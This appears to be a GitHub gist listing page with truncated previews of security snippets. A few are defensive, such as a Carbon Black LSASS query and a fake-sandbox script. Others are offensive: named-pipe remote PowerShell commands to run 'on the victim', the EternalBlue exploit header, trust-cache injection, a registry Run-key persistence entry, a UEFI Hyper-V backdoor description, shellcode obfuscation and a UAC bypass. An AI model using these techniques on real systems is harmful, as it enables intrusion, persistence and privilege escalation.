This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Carbon Black Evil PowerShell LSASS Query | |
# | |
# Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe | |
# | |
# Author: Jason Lang (@curi0usJack) | |
# | |
# Prereqs (Windows 10) | |
# Install bash on Win10 | |
# sudo apt-get install python-pip | |
# sudo pip install --upgrade requests |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Simulate fake processes of analysis sandbox/VM that some malware will try to evade | |
# This just spawn ping.exe with different names (wireshark.exe, vboxtray.exe, ...) | |
# It's just a PoC and it's ugly as f*ck but hey, if it works... | |
# Usage: .\fake_sandbox.ps1 -action {start,stop} | |
param([Parameter(Mandatory=$true)][string]$action) | |
$fakeProcesses = @("wireshark.exe", "vmacthlp.exe", "VBoxService.exe", | |
"VBoxTray.exe", "procmon.exe", "ollydbg.exe", "vmware-tray.exe", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var logger = console.trace; | |
// ELEMENT | |
;(getElementByIdCopy => { | |
Element.prototype.getElementById = function(q) { | |
logger('getElementById', q, this, this.innerHTML); | |
return Reflect.apply(getElementByIdCopy, this, [q]) | |
} | |
})(Element.prototype.getElementById) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Command to run on the victim | |
# This will establish a PowerShell listener over the "pwnme" named pipe | |
remote /S "powershell.exe" pwnme | |
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
remote /C [Hostname\IP] "pwnme" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 7/2008 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
void inject_trusts(int pathc, const char *paths[]) | |
{ | |
printf("[+] injecting into trust cache...\n"); | |
extern uint64_t g_kern_base; | |
static uint64_t tc = 0; | |
if (tc == 0) { | |
/* loaded_trust_caches | |
iPhone11,2-4-6: 0xFFFFFFF008F702C8 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] | |
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\"" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
********************************************************************* | |
Part of UEFI DXE driver code that injects Hyper-V VM exit handler | |
backdoor into the Device Guard enabled Windows 10 Enterprise. | |
Execution starts from new_ExitBootServices() -- a hook handler | |
for EFI_BOOT_SERVICES.ExitBootServices() which being called by | |
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi | |
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Transform a binary file into a C header file. | |
The binary file is splitted into 16 char strings and rebuild at execution time. | |
The function buildsc() must be called in your main to rebuild the binary file into the sc C variable. | |
The length is set in the sc_length variable. | |
Be carefull, try to avoid compiler code optimization as it will remove all these modifications in the final binary. | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Powershell script to bypass UAC on Vista+ assuming | |
# there exists one elevated process on the same desktop. | |
# Technical details in: | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html | |
# You need to Install-Module NtObjectManager for this to run. | |
Import-Module NtObjectManager |
OlderNewer